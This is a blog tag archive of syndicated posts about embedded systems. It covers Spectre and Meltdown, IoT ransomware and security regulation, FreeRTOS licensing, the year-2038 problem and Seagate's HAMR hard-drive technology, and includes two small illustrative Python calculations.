Tag Archives: Embedded Systems

[$] Prospects for free software in cars

Post Syndicated from jake original https://lwn.net/Articles/751165/rss

Car manufacturers, like most companies, navigate a narrow lane between the
benefits of using free and open-source software and the perceived or real
importance of hiding their trade secrets. Many are using
free software in some of the myriad software components that make up a
modern car, and even work in consortia to develop free software. At the
recent LibrePlanet
conference, free-software advocate Jeremiah Foster covered progress in the
automotive sector and made an impassioned case for more free software in the
embedded systems found in cars.

Subscribers can read on for a report on the talk by guest author Andy Oram.

Spectre and Meltdown Attacks Against Microprocessors

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/01/spectre_and_mel_1.html

The security of pretty much every computer on the planet has just gotten a lot worse, and the only real solution — which of course is not a solution — is to throw them all away and buy new ones.

On Wednesday, researchers announced a series of major security vulnerabilities in the microprocessors at the heart of the world’s computers for the past 15-20 years. They’ve been named Spectre and Meltdown, and they have to do with manipulating different ways processors optimize performance by rearranging the order of instructions or performing different instructions in parallel. An attacker who controls one process on a system can use the vulnerabilities to steal secrets elsewhere on the computer. (The research papers are here and here.)

This means that a malicious app on your phone could steal data from your other apps. Or a malicious program on your computer — maybe one running in a browser window from that sketchy site you’re visiting, or as a result of a phishing attack — can steal data elsewhere on your machine. Cloud services, which often share machines amongst several customers, are especially vulnerable. This affects corporate applications running on cloud infrastructure, and end-user cloud applications like Google Drive. Someone can run a process in the cloud and steal data from every other user on the same hardware.

Information about these flaws has been secretly circulating amongst the major IT companies for months as they researched the ramifications and coordinated updates. The details were supposed to be released next week, but the story broke early and everyone is scrambling. By now all the major cloud vendors have patched their systems against the vulnerabilities that can be patched against.

“Throw it away and buy a new one” is ridiculous security advice, but it’s what US-CERT recommends. It is also unworkable. The problem is that there isn’t anything to buy that isn’t vulnerable. Pretty much every major processor made in the past 20 years is vulnerable to some flavor of these vulnerabilities. Patching against Meltdown can degrade performance by almost a third. And there’s no patch for Spectre; the microprocessors have to be redesigned to prevent the attack, and that will take years. (Here’s a running list of who’s patched what.)

This is bad, but expect it more and more. Several trends are converging in a way that makes our current system of patching security vulnerabilities harder to implement.

The first is that these vulnerabilities affect embedded computers in consumer devices. Unlike our computers and phones, these systems are designed and produced at a lower profit margin with less engineering expertise. There aren’t security teams on call to write patches, and there often aren’t mechanisms to push patches onto the devices. We’re already seeing this with home routers, digital video recorders, and webcams. The vulnerability that allowed them to be taken over by the Mirai botnet last August simply can’t be fixed.

The second is that some of the patches require updating the computer’s firmware. This is much harder to walk consumers through, and is more likely to permanently brick the device if something goes wrong. It also requires more coordination. In November, Intel released a firmware update to fix a vulnerability in its Management Engine (ME): another flaw in its microprocessors. But it couldn’t get that update directly to users; it had to work with the individual hardware companies, and some of them just weren’t capable of getting the update to their customers.

We’re already seeing this. Some patches require users to disable the computer’s password, which means organizations can’t automate the patch. Some antivirus software blocks the patch, or — worse — crashes the computer. This results in a three-step process: patch your antivirus software, patch your operating system, and then patch the computer’s firmware.

The final reason is the nature of these vulnerabilities themselves. These aren’t normal software vulnerabilities, where a patch fixes the problem and everyone can move on. These vulnerabilities are in the fundamentals of how the microprocessor operates.

It shouldn’t be surprising that microprocessor designers have been building insecure hardware for 20 years. What’s surprising is that it took 20 years to discover it. In their rush to make computers faster, they weren’t thinking about security. They didn’t have the expertise to find these vulnerabilities. And those who did were too busy finding normal software vulnerabilities to examine microprocessors. Security researchers are starting to look more closely at these systems, so expect to hear about more vulnerabilities along these lines.

Spectre and Meltdown are pretty catastrophic vulnerabilities, but they only affect the confidentiality of data. Now that they — and the research into the Intel ME vulnerability — have shown researchers where to look, more is coming — and what they’ll find will be worse than either Spectre or Meltdown. There will be vulnerabilities that will allow attackers to manipulate or delete data across processes, potentially fatal in the computers controlling our cars or implanted medical devices. These will be similarly impossible to fix, and the only strategy will be to throw our devices away and buy new ones.

This isn’t to say you should immediately turn your computers and phones off and not use them for a few years. For the average user, this is just another attack method amongst many. All the major vendors are working on patches and workarounds for the attacks they can mitigate. All the normal security advice still applies: watch for phishing attacks, don’t click on strange e-mail attachments, don’t visit sketchy websites that might run malware on your browser, patch your systems regularly, and generally be careful on the Internet.

You probably won’t notice that performance hit once Meltdown is patched, except maybe in backup programs and networking applications. Embedded systems that do only one task, like your programmable thermostat or the computer in your refrigerator, are unaffected. Small microprocessors that don’t do all of the vulnerable fancy performance tricks are unaffected. Browsers will figure out how to mitigate this in software. Overall, the security of the average Internet-of-Things device is so bad that this attack is in the noise compared to the previously known risks.

It’s a much bigger problem for cloud vendors; the performance hit will be expensive, but I expect that they’ll figure out some clever way of detecting and blocking the attacks. All in all, as bad as Spectre and Meltdown are, I think we got lucky.

But more are coming, and they’ll be worse. 2018 will be the year of microprocessor vulnerabilities, and it’s going to be a wild ride.

Note: A shorter version of this essay previously appeared on CNN.com. My previous blog post on this topic contains additional links.

What is HAMR and How Does It Enable the High-Capacity Needs of the Future?

Post Syndicated from Andy Klein original https://www.backblaze.com/blog/hamr-hard-drives/

HAMR drive illustration

During Q4, Backblaze deployed 100 petabytes worth of Seagate hard drives to our data centers. The newly deployed Seagate 10 and 12 TB drives are doing well and will help us meet our near-term storage needs, but we know we’re going to need more drives — with higher capacities. That’s why the success of new hard drive technologies like Heat-Assisted Magnetic Recording (HAMR) from Seagate is very relevant to us here at Backblaze and to the storage industry in general. In today’s guest post we are pleased to have Mark Re, CTO at Seagate, give us an insider’s look behind the hard drive curtain to tell us how Seagate engineers are developing HAMR technology and making it market ready starting in late 2018.

What is HAMR and How Does It Enable the High-Capacity Needs of the Future?

Guest Blog Post by Mark Re, Seagate Senior Vice President and Chief Technology Officer

Earlier this year Seagate announced plans to make the first hard drives using Heat-Assisted Magnetic Recording, or HAMR, available by the end of 2018 in pilot volumes. Even as today’s market has embraced 10TB+ drives, the need for 20TB+ drives remains imperative in the relative near term. HAMR is the Seagate research team’s next major advance in hard drive technology.

HAMR is a technology that over time will enable a big increase in the amount of data that can be stored on a disk. A small laser is attached to a recording head, designed to heat a tiny spot on the disk where the data will be written. This allows a smaller bit cell to be written as either a 0 or a 1. The smaller bit cell size enables more bits to be crammed into a given surface area — increasing the areal density of data, and increasing drive capacity.

It sounds almost simple, but the science and engineering expertise required — the research, experimentation, lab development, and product development needed to perfect this technology — has been enormous. Below is an overview of the HAMR technology; you can dig into the details in our technical brief, which provides a point-by-point rundown of several key advances enabling the HAMR design.

As much time and resources as have been committed to developing HAMR, the need for its increased data density is indisputable. Demand for data storage keeps increasing. Businesses’ ability to manage and leverage more capacity is a competitive necessity, and IT spending on capacity continues to increase.

History of Increasing Storage Capacity

For the last 50 years, areal density in hard disk drives has been growing faster than Moore’s law, which is a very good thing. After all, customers from data centers and cloud service providers to creative professionals and game enthusiasts rarely go shopping for a hard drive just like the one they bought two years ago. As the amount of data grows, the demands on storage capacity inevitably increase, so the technology must constantly evolve.

According to the Advanced Storage Technology Consortium, HAMR will be the next significant storage technology innovation to increase the amount of data that can be stored in a given area of disk surface, also called the disk’s “areal density.” We believe this boost in areal density will help fuel hard drive product development and growth through the next decade.

Why do we Need to Develop Higher-Capacity Hard Drives? Can’t Current Technologies do the Job?

Why is HAMR’s increased data density so important?

Data has become critical to all aspects of human life, changing how we’re educated and entertained. It affects and informs the ways we experience each other and interact with businesses and the wider world. IDC research shows the datasphere — all the data generated by the world’s businesses and billions of consumer endpoints — will continue to double in size every two years. IDC forecasts that by 2025 the global datasphere will grow to 163 zettabytes (a zettabyte is a trillion gigabytes). That’s ten times the 16.1 ZB of data generated in 2016. IDC cites five key trends intensifying the role of data in changing our world: embedded systems and the Internet of Things (IoT), instantly available mobile and real-time data, cognitive artificial intelligence (AI) systems, increased security data requirements, and critically, the evolution of data from playing a background role in business to playing a life-critical role.

Consumers use the cloud to manage everything from family photos and videos to data about their health and exercise routines. Real-time data created by connected devices — everything from Fitbit, Alexa and smart phones to home security systems, solar systems and autonomous cars — are fueling the emerging Data Age. On top of the obvious business and consumer data growth, our critical infrastructure like power grids, water systems, hospitals, road infrastructure and public transportation all demand and add to the growth of real-time data. Data is now a vital element in the smooth operation of all aspects of daily life.

Behind the scenes, this insatiable global appetite for data storage entails a significant infrastructure cost. While a variety of storage technologies will continue to advance in data density (Seagate announced the first 60TB 3.5-inch SSD unit, for example), high-capacity hard drives remain the foundational core of our interconnected, cloud- and IoT-based dependence on data.

HAMR Hard Drive Technology

Seagate has been working on heat-assisted magnetic recording (HAMR) in one form or another since the late 1990s. During this time we’ve made many breakthroughs: reliable near-field transducers, special high-capacity HAMR media, and a way to put a laser, no larger than a grain of salt, on each and every head.

The development of HAMR has required Seagate to consider and overcome a myriad of scientific and technical challenges including new kinds of magnetic media, nano-plasmonic device design and fabrication, laser integration, high-temperature head-disk interactions, and thermal regulation.

A typical hard drive inside any computer or server contains one or more rigid disks coated with a magnetically sensitive film consisting of tiny magnetic grains. Data is recorded when a magnetic write-head flies just above the spinning disk; the write head rapidly flips the magnetization of one magnetic region of grains so that its magnetic pole points up or down, to encode a 1 or a 0 in binary code.

Increasing the amount of data you can store on a disk requires cramming magnetic regions closer together, which means the grains need to be smaller so they won’t interfere with each other.

Heat Assisted Magnetic Recording (HAMR) is the next step to enable us to increase the density of grains — or bit density. Current projections are that HAMR can achieve 5 Tbpsi (Terabits per square inch) on conventional HAMR media, and in the future will be able to achieve 10 Tbpsi or higher with bit patterned media (in which discrete dots are predefined on the media in regular, efficient, very dense patterns). These technologies will enable hard drives with capacities higher than 100 TB before 2030.
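As a rough sanity check on those projections, the capacity implied by a given areal density is simple arithmetic. The sketch below assumes illustrative platter geometry and platter count (these are not Seagate figures):

```python
import math

# Assumed usable recording band on one surface of a 3.5" platter
# (radii in inches; illustrative values, not Seagate's numbers).
outer_radius = 1.84
inner_radius = 0.60
surface_area = math.pi * (outer_radius**2 - inner_radius**2)  # ~9.5 sq. in.

areal_density_tbpsi = 5.0  # terabits per square inch (the HAMR projection above)
tb_per_surface = surface_area * areal_density_tbpsi / 8  # terabits -> terabytes

platters = 9  # assumed; today's high-capacity 3.5" drives use 8-9 platters
capacity_tb = tb_per_surface * 2 * platters  # two recording surfaces per platter
print(round(capacity_tb))  # ~107, i.e. on the order of 100 TB
```

Under these assumptions, 5 Tbpsi already lands in the neighborhood of 100 TB per drive, and the projected 10 Tbpsi with bit-patterned media would double that, consistent with the capacities cited above.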

The major problem with packing bits so closely together is that if you do that on conventional magnetic media, the bits (and the data they represent) become thermally unstable, and may flip. So, to make the grains maintain their stability — their ability to store bits over a long period of time — we need to develop a recording media that has higher coercivity. That means it’s magnetically more stable during storage, but it is more difficult to change the magnetic characteristics of the media when writing (harder to flip a grain from a 0 to a 1 or vice versa).

That’s why HAMR’s first key hardware advance required developing a new recording media that keeps bits stable — using high anisotropy (or “hard”) magnetic materials such as iron-platinum alloy (FePt), which resist magnetic change at normal temperatures. Over years of HAMR development, Seagate researchers have tested and proven out a variety of FePt granular media films, with varying alloy composition and chemical ordering.

In fact the new media is so “hard” that conventional recording heads won’t be able to flip the bits, or write new data, under normal temperatures. If you add heat to the tiny spot on which you want to write data, you can make the media’s coercive field lower than the magnetic field provided by the recording head — in other words, enable the write head to flip that bit.

So, a challenge with HAMR has been to replace conventional perpendicular magnetic recording (PMR), in which the write head operates at room temperature, with a write technology that heats the thin film recording medium on the disk platter to temperatures above 400 °C. The basic principle is to heat a tiny region of several magnetic grains for a very short time (~1 nanosecond) to a temperature high enough to make the media’s coercive field lower than the write head’s magnetic field. Immediately after the heat pulse, the region quickly cools down and the bit’s magnetic orientation is frozen in place.

Applying this dynamic nano-heating is where HAMR’s famous “laser” comes in. A plasmonic near-field transducer (NFT) has been integrated into the recording head, to heat the media and enable magnetic change at a specific point. Plasmonic NFTs are used to focus and confine light energy to regions smaller than the wavelength of light. This enables us to heat an extremely small region, measured in nanometers, on the disk media to reduce its magnetic coercivity.

Moving HAMR Forward

HAMR write head

As always in advanced engineering, the devil — or many devils — is in the details. As noted earlier, our technical brief provides a point-by-point short illustrated summary of HAMR’s key changes.

Although hard work remains, we believe this technology is nearly ready for commercialization. Seagate has the best engineers in the world working towards a goal of a 20 Terabyte drive by 2019. We hope we’ve given you a glimpse into the amount of engineering that goes into a hard drive. Keeping up with the world’s insatiable appetite to create, capture, store, secure, manage, analyze, rapidly access and share data is a challenge we work on every day.

With thousands of HAMR drives already being made in our manufacturing facilities, our internal and external supply chain is solidly in place, and volume manufacturing tools are online. This year we began shipping initial units for customer tests, and production units will ship to key customers by the end of 2018. Prepare for breakthrough capacities.


Announcing FreeRTOS Kernel Version 10 (AWS Open Source Blog)

Post Syndicated from jake original https://lwn.net/Articles/740372/rss

Amazon has announced the release of FreeRTOS kernel version 10, with a new license: “FreeRTOS was created in 2003 by Richard Barry. It rapidly became popular, consistently ranking very high in EETimes surveys on embedded operating systems. After 15 years of maintaining this critical piece of software infrastructure with very limited human resources, last year Richard joined Amazon.

Today we are releasing the core open source code as FreeRTOS kernel version 10, now under the MIT license (instead of its previous modified GPLv2 license). Simplified licensing has long been requested by the FreeRTOS community. The specific choice of the MIT license was based on the needs of the embedded systems community: the MIT license is commonly used in open hardware projects, and is generally whitelisted for enterprise use.” While the modified GPLv2 was removed, it was replaced with a slightly modified MIT license that adds: “If you wish to use our Amazon FreeRTOS name, please do so in a fair use way that does not cause confusion.” There is concern that the change makes it a different license; the Open Source Initiative and Amazon open-source folks are working on clarifying that.

[$] Mongoose OS for IoT prototyping

Post Syndicated from jake original https://lwn.net/Articles/733297/rss

Mongoose OS is an open-source
operating system for tiny embedded systems. It is designed to run on
devices such as microcontrollers, which are often constrained with memory on the
order of tens of kilobytes, while exposing a programming interface that
provides access to modern APIs normally found on more powerful devices. A
device running Mongoose OS has access to operating system functionality
such as filesystems and networking, plus higher-level software such as a
JavaScript engine and cloud access APIs.

Vulnerabilities in Car Washes

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2017/08/vulnerabilities_6.html

Articles about serious vulnerabilities in IoT devices and embedded systems are now a dime a dozen. This one concerns Internet-connected car washes:

A group of security researchers have found vulnerabilities in internet-connected drive-through car washes that would let hackers remotely hijack the systems to physically attack vehicles and their occupants. The vulnerabilities would let an attacker open and close the bay doors on a car wash to trap vehicles inside the chamber, or strike them with the doors, damaging them and possibly injuring occupants.

The Future of Ransomware

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2017/05/the_future_of_r.html

Ransomware isn’t new, but it’s increasingly popular and profitable.

The concept is simple: Your computer gets infected with a virus that encrypts your files until you pay a ransom. It’s extortion taken to its networked extreme. The criminals provide step-by-step instructions on how to pay, sometimes even offering a help line for victims unsure how to buy bitcoin. The price is designed to be cheap enough for people to pay instead of giving up: a few hundred dollars in many cases. Those who design these systems know their market, and it’s a profitable one.

The ransomware that recently affected systems in more than 150 countries, WannaCry, made press headlines last week, but it doesn’t seem to be more virulent or more expensive than other ransomware. This one has a particularly interesting pedigree: It’s based on a vulnerability developed by the National Security Agency that can be used against many versions of the Windows operating system. The NSA’s code was, in turn, stolen by an unknown hacker group called Shadow Brokers, widely believed by the security community to be the Russians, in 2014 and released to the public in April.

Microsoft patched the vulnerability a month earlier, presumably after being alerted by the NSA that the leak was imminent. But the vulnerability affected older versions of Windows that Microsoft no longer supports, and there are still many people and organizations that don’t regularly patch their systems. This allowed whoever wrote WannaCry (it could be anyone from a lone individual to an organized crime syndicate) to use it to infect computers and extort users.

The lessons for users are obvious: Keep your system patches up to date and regularly back up your data. This isn’t just good advice to defend against ransomware, but good advice in general. But it’s becoming obsolete.

Everything is becoming a computer. Your microwave is a computer that makes things hot. Your refrigerator is a computer that keeps things cold. Your car and television, the traffic lights and signals in your city and our national power grid are all computers. This is the much-hyped Internet of Things (IoT). It’s coming, and it’s coming faster than you might think. And as these devices connect to the Internet, they become vulnerable to ransomware and other computer threats.

It’s only a matter of time before people get messages on their car screens saying that the engine has been disabled and it will cost $200 in bitcoin to turn it back on. Or a similar message on their phones about their Internet-enabled door lock: Pay $100 if you want to get into your house tonight. Or pay far more if they want their embedded heart defibrillator to keep working.

This isn’t just theoretical. Researchers have already demonstrated a ransomware attack against smart thermostats, which may sound like a nuisance at first but can cause serious property damage if it’s cold enough outside. If the device under attack has no screen, you’ll get the message on the smartphone app you control it from.

Hackers don’t even have to come up with these ideas on their own; the government agencies whose code was stolen were already doing it. One of the leaked CIA attack tools targets Internet-enabled Samsung smart televisions.

Even worse, the usual solutions won’t work with these embedded systems. You have no way to back up your refrigerator’s software, and it’s unclear whether that solution would even work if an attack targets the functionality of the device rather than its stored data.

These devices will be around for a long time. Unlike our phones and computers, which we replace every few years, cars are expected to last at least a decade. We want our appliances to run for 20 years or more, our thermostats even longer.

What happens when the company that made our smart washing machine — or just the computer part — goes out of business, or otherwise decides that they can no longer support older models? WannaCry affected Windows versions as far back as XP, a version that Microsoft no longer supports. The company broke with policy and released a patch for those older systems, but it has both the engineering talent and the money to do so.

That won’t happen with low-cost IoT devices.

Those devices are built on the cheap, and the companies that make them don’t have the dedicated teams of security engineers ready to craft and distribute security patches. The economics of the IoT doesn’t allow for it. Even worse, many of these devices aren’t patchable. Remember last fall when the Mirai botnet infected hundreds of thousands of Internet-enabled digital video recorders, webcams and other devices and launched a massive denial-of-service attack that resulted in a host of popular websites dropping off the Internet? Most of those devices couldn’t be fixed with new software once they were attacked. The way you update your DVR is to throw it away and buy a new one.

Solutions aren’t easy and they’re not pretty. The market is not going to fix this unaided. Security is a hard-to-evaluate feature against a possible future threat, and consumers have long rewarded companies that provide easy-to-compare features and a quick time-to-market at the expense of security. We need to assign liabilities to companies that write insecure software that harms people, and possibly even issue and enforce regulations that require companies to maintain software systems throughout their life cycle. We may need minimum security standards for critical IoT devices. And it would help if the NSA got more involved in securing our information infrastructure and less in keeping it vulnerable so the government can eavesdrop.

I know this all sounds politically impossible right now, but we simply cannot live in a future where everything, from the things we own to our nation’s infrastructure, can be held for ransom by criminals again and again.

This essay previously appeared in the Washington Post.

Acoustic Attack Against Accelerometers

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2017/04/acoustic_attack.html

Interesting acoustic attack against the MEMS accelerometers in devices like FitBits.

Millions of accelerometers reside inside smartphones, automobiles, medical devices, anti-theft devices, drones, IoT devices, and many other industrial and consumer applications. Our work investigates how analog acoustic injection attacks can damage the digital integrity of the capacitive MEMS accelerometer. Spoofing such sensors with intentional acoustic interference enables an out-of-spec pathway for attackers to deliver chosen digital values to microprocessors and embedded systems that blindly trust the unvalidated integrity of sensor outputs. Our contributions include (1) modeling the physics of malicious acoustic interference on MEMS accelerometers, (2) discovering the circuit-level security flaws that cause the vulnerabilities by measuring acoustic injection attacks on MEMS accelerometers as well as systems that employ these sensors, and (3) two software-only defenses that mitigate many of the risks to the integrity of MEMS accelerometer outputs.

This is not that big a deal with things like FitBits, but as IoT devices get more autonomous — and start making decisions and then putting them into effect automatically — these vulnerabilities will become critical.
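One plausible instance of such a software-only defense is to low-pass filter the sensor stream: the injected acoustic tone sits near the accelerometer’s resonant frequency, far above the frequencies of real motion. The sketch below illustrates the idea; the sample rate, frequencies, and filter constant are illustrative assumptions, not values from the paper:

```python
import math

def lowpass(samples, alpha):
    """Single-pole IIR low-pass filter: y += alpha * (x - y)."""
    out, y = [], 0.0
    for x in samples:
        y += alpha * (x - y)
        out.append(y)
    return out

fs = 1000  # Hz, assumed sample rate
t = [i / fs for i in range(2000)]
motion = [math.sin(2 * math.pi * 2 * ti) for ti in t]        # 2 Hz real motion
tone = [0.5 * math.sin(2 * math.pi * 300 * ti) for ti in t]  # 300 Hz injected tone
raw = [m + j for m, j in zip(motion, tone)]

filtered = lowpass(raw, alpha=0.05)  # cutoff around 8 Hz at fs = 1000 Hz

def amp_at_300hz(sig):
    """Estimate the in-phase 300 Hz amplitude over the second half of the trace."""
    n = len(sig) // 2  # skip the filter's start-up transient
    return abs(sum(sig[i] * math.sin(2 * math.pi * 300 * t[i])
                   for i in range(n, len(sig))) * 2 / n)

print(amp_at_300hz(raw))       # ~0.5: the spoofed tone dominates the raw output
print(amp_at_300hz(filtered))  # near zero: the tone is strongly attenuated
```

This is only a conceptual sketch of why frequency separation helps; the paper’s actual defenses operate at the sampling and driver level, and a real implementation would have to avoid discarding legitimate high-frequency motion.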

Academic paper.

[$] 2038: only 21 years away

Post Syndicated from corbet original https://lwn.net/Articles/717076/rss

Sometimes it seems that things have gone relatively quiet on the year-2038
front. But time keeps moving forward, and the point in early 2038 when
32-bit time_t values can no longer represent times correctly is
now less than 21 years away. That may seem like a long time, but the
relatively long life cycle of many
embedded systems means that some systems deployed today will still be in
service when that deadline hits. One of the developers leading the effort
to address this problem is Arnd Bergmann; at Linaro Connect 2017 he gave an
update on where that work stands.
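The arithmetic behind the deadline is easy to check: a signed 32-bit time_t counts seconds from the Unix epoch and tops out at 2**31 - 1. A quick sketch (using Python's datetime arithmetic rather than the C library):

```python
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
TIME_T_MAX = 2**31 - 1  # largest value a signed 32-bit time_t can hold

overflow_moment = EPOCH + timedelta(seconds=TIME_T_MAX)
print(overflow_moment)  # 2038-01-19 03:14:07+00:00

# One second later the counter wraps to -2**31, i.e. back to December 1901.
wrap = EPOCH + timedelta(seconds=-(2**31))
print(wrap)             # 1901-12-13 20:45:52+00:00
```

The wraparound to 1901 is what makes the failure mode so nasty for deployed embedded systems: timestamps don't merely stop advancing, they jump backwards by 136 years.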

Security and Privacy Guidelines for the Internet of Things

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2017/02/security_and_pr.html

Lately, I have been collecting IoT security and privacy guidelines. Here’s everything I’ve found:

  1. “Internet of Things (IoT) Security and Privacy Recommendations,” Broadband Internet Technical Advisory Group, Nov 2016.

  2. “IoT Security Guidance,” Open Web Application Security Project (OWASP), May 2016.

  3. “Strategic Principles for Securing the Internet of Things (IoT),” US Department of Homeland Security, Nov 2016.

  4. “Security,” OneM2M Technical Specification, Aug 2016.

  5. “Security Solutions,” OneM2M Technical Specification, Aug 2016.

  6. “IoT Security Guidelines Overview Document,” GSM Alliance, Feb 2016.

  7. “IoT Security Guidelines For Service Ecosystems,” GSM Alliance, Feb 2016.

  8. “IoT Security Guidelines for Endpoint Ecosystems,” GSM Alliance, Feb 2016.

  9. “IoT Security Guidelines for Network Operators,” GSM Alliance, Feb 2016.

  10. “Establishing Principles for Internet of Things Security,” IoT Security Foundation, undated.

  11. “IoT Design Manifesto,” May 2015.

  12. “NYC Guidelines for the Internet of Things,” City of New York, undated.

  13. “IoT Security Compliance Framework,” IoT Security Foundation, 2016.

  14. “Principles, Practices and a Prescription for Responsible IoT and Embedded Systems Development,” IoTIAP, Nov 2016.

  15. “IoT Trust Framework,” Online Trust Alliance, Jan 2017.

  16. “Five Star Automotive Cyber Safety Framework,” I am the Cavalry, Feb 2015.

  17. “Hippocratic Oath for Connected Medical Devices,” I am the Cavalry, Jan 2016.

Other, related, items:

  1. “We All Live in the Computer Now,” The Netgain Partnership, Oct 2016.

  2. “Comments of EPIC to the FTC on the Privacy and Security Implications of the Internet of Things,” Electronic Privacy Information Center, Jun 2013.

  3. “Internet of Things Software Update Workshop (IoTSU),” Internet Architecture Board, Jun 2016.

They all largely say the same things: avoid known vulnerabilities, don’t have insecure defaults, make your systems patchable, and so on.

My guess is that everyone knows that IoT regulation is coming, and is either trying to impose self-regulation to forestall government action or establish principles to influence government action. It’ll be interesting to see how the next few years unfold.

If there are any IoT security or privacy guideline documents that I’m missing, please tell me in the comments.

Dz: Seccomp sandboxing not enabled for acme-client

Post Syndicated from jake original https://lwn.net/Articles/713464/rss

In the acme-client-portable repository at GitHub, developer Kristaps Dz has a rather stinging indictment of trying to use seccomp sandboxing for the portable version of acme-client, which is a client program for getting Let’s Encrypt certificates. He has disabled seccomp filtering in the default build for a number of reasons. “So I might use mmap, but the system call is mmap2? Great. This brings us to the second and larger problem. The C library. There are several popular ones on Linux: glibc, musl, uClibc, etc. Each of these is free to implement any standard function (like mmap, above) in any way. So while my code might say read, the C library might also invoke fstat. Great.

In general, section 2 calls (system calls) map evenly between system call name and function name. (Except as noted above… and maybe elsewhere…) However, section 3 is all over the place. The strongest differences were between big functions like getaddrinfo(2).

Then there’s local modifications. And not just between special embedded systems. But Debian and Arch, both using glibc and both on x86_64, have different kernels installed with different features. Great.

Less great for me and seccomp.” (Thanks to Paul Wise.)

Security and the Internet of Things

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2017/02/security_and_th.html

Last year, on October 21, your digital video recorder -- or at least a DVR like yours -- knocked Twitter off the internet. Someone used your DVR, along with millions of insecure webcams, routers, and other connected devices, to launch an attack that started a chain reaction, resulting in Twitter, Reddit, Netflix, and many other sites going off the internet. You probably didn't realize that your DVR had that kind of power. But it does.

All computers are hackable. This has as much to do with the computer market as it does with the technologies. We prefer our software full of features and inexpensive, at the expense of security and reliability. That your computer can affect the security of Twitter is a market failure. The industry is filled with market failures that, until now, have been largely ignorable. As computers continue to permeate our homes, cars, and businesses, these market failures will no longer be tolerable. Our only solution will be regulation, and that regulation will be foisted on us by a government desperate to "do something" in the face of disaster.

In this article I want to outline the problems, both technical and political, and point to some regulatory solutions. Regulation might be a dirty word in today’s political climate, but security is the exception to our small-government bias. And as the threats posed by computers become greater and more catastrophic, regulation will be inevitable. So now’s the time to start thinking about it.

We also need to reverse the trend of connecting everything to the internet. And where the risks include harm and even death, we need to think twice about what we connect and what we deliberately leave uncomputerized.

If we get this wrong, the computer industry will look like the pharmaceutical industry, or the aircraft industry. But if we get this right, we can maintain the innovative environment of the internet that has given us so much.

**********

We no longer have things with computers embedded in them. We have computers with things attached to them.

Your modern refrigerator is a computer that keeps things cold. Your oven, similarly, is a computer that makes things hot. An ATM is a computer with money inside. Your car is no longer a mechanical device with some computers inside; it’s a computer with four wheels and an engine. Actually, it’s a distributed system of over 100 computers with four wheels and an engine. And, of course, your phones became full-power general-purpose computers in 2007, when the iPhone was introduced.

We wear computers: fitness trackers and computer-enabled medical devices -- and, of course, we carry our smartphones everywhere. Our homes have smart thermostats, smart appliances, smart door locks, even smart light bulbs. At work, many of those same smart devices are networked together with CCTV cameras, sensors that detect customer movements, and everything else. Cities are starting to embed smart sensors in roads, streetlights, and sidewalk squares, as well as smart energy grids and smart transportation networks. A nuclear power plant is really just a computer that produces electricity, and -- like everything else we've just listed -- it's on the internet.

The internet is no longer a web that we connect to. Instead, it’s a computerized, networked, and interconnected world that we live in. This is the future, and what we’re calling the Internet of Things.

Broadly speaking, the Internet of Things has three parts. There are the sensors that collect data about us and our environment: smart thermostats, street and highway sensors, and those ubiquitous smartphones with their motion sensors and GPS location receivers. Then there are the "smarts" that figure out what the data means and what to do about it. This includes all the computer processors on these devices and, increasingly, in the cloud, as well as the memory that stores all of this information. And finally, there are the actuators that affect our environment. The point of a smart thermostat isn't to record the temperature; it's to control the furnace and the air conditioner. Driverless cars collect data about the road and the environment to steer themselves safely to their destinations.

You can think of the sensors as the eyes and ears of the internet. You can think of the actuators as the hands and feet of the internet. And you can think of the stuff in the middle as the brain. We are building an internet that senses, thinks, and acts.

This is the classic definition of a robot. We’re building a world-size robot, and we don’t even realize it.

To be sure, it’s not a robot in the classical sense. We think of robots as discrete autonomous entities, with sensors, brain, and actuators all together in a metal shell. The world-size robot is distributed. It doesn’t have a singular body, and parts of it are controlled in different ways by different people. It doesn’t have a central brain, and it has nothing even remotely resembling a consciousness. It doesn’t have a single goal or focus. It’s not even something we deliberately designed. It’s something we have inadvertently built out of the everyday objects we live with and take for granted. It is the extension of our computers and networks into the real world.

This world-size robot is actually more than the Internet of Things. It's a combination of several decades-old computing trends: mobile computing, cloud computing, always-on computing, huge databases of personal information, the Internet of Things -- or, more precisely, cyber-physical systems -- autonomy, and artificial intelligence. And while it's still not very smart, it'll get smarter. It'll get more powerful and more capable through all the interconnections we're building.

It’ll also get much more dangerous.

**********

Computer security has been around for almost as long as computers have been. And while it’s true that security wasn’t part of the design of the original internet, it’s something we have been trying to achieve since its beginning.

I have been working in computer security for over 30 years: first in cryptography, then more generally in computer and network security, and now in general security technology. I have watched computers become ubiquitous, and have seen firsthand the problems -- and solutions -- of securing these complex machines and systems. I'm telling you all this because what used to be a specialized area of expertise now affects everything. Computer security is now everything security. There's one critical difference, though: The threats have become greater.

Traditionally, computer security is divided into three categories: confidentiality, integrity, and availability. For the most part, our security concerns have centered on confidentiality. We're concerned about our data and who has access to it -- the world of privacy and surveillance, of data theft and misuse.

But threats come in many forms. Availability threats: computer viruses that delete our data, or ransomware that encrypts our data and demands payment for the unlock key. Integrity threats: hackers who can manipulate data entries can do things ranging from changing grades in a class to changing the amount of money in bank accounts. Some of these threats are pretty bad. Hospitals have paid tens of thousands of dollars to criminals whose ransomware encrypted critical medical files. JPMorgan Chase spends half a billion dollars a year on cybersecurity.

Today, the integrity and availability threats are much worse than the confidentiality threats. Once computers start affecting the world in a direct and physical manner, there are real risks to life and property. There is a fundamental difference between crashing your computer and losing your spreadsheet data, and crashing your pacemaker and losing your life. This isn’t hyperbole; recently researchers found serious security vulnerabilities in St. Jude Medical’s implantable heart devices. Give the internet hands and feet, and it will have the ability to punch and kick.

Take a concrete example: modern cars, those computers on wheels. The steering wheel no longer turns the axles, nor does the accelerator pedal change the speed. Every move you make in a car is processed by a computer, which does the actual controlling. A central computer controls the dashboard. There’s another in the radio. The engine has 20 or so computers. These are all networked, and increasingly autonomous.

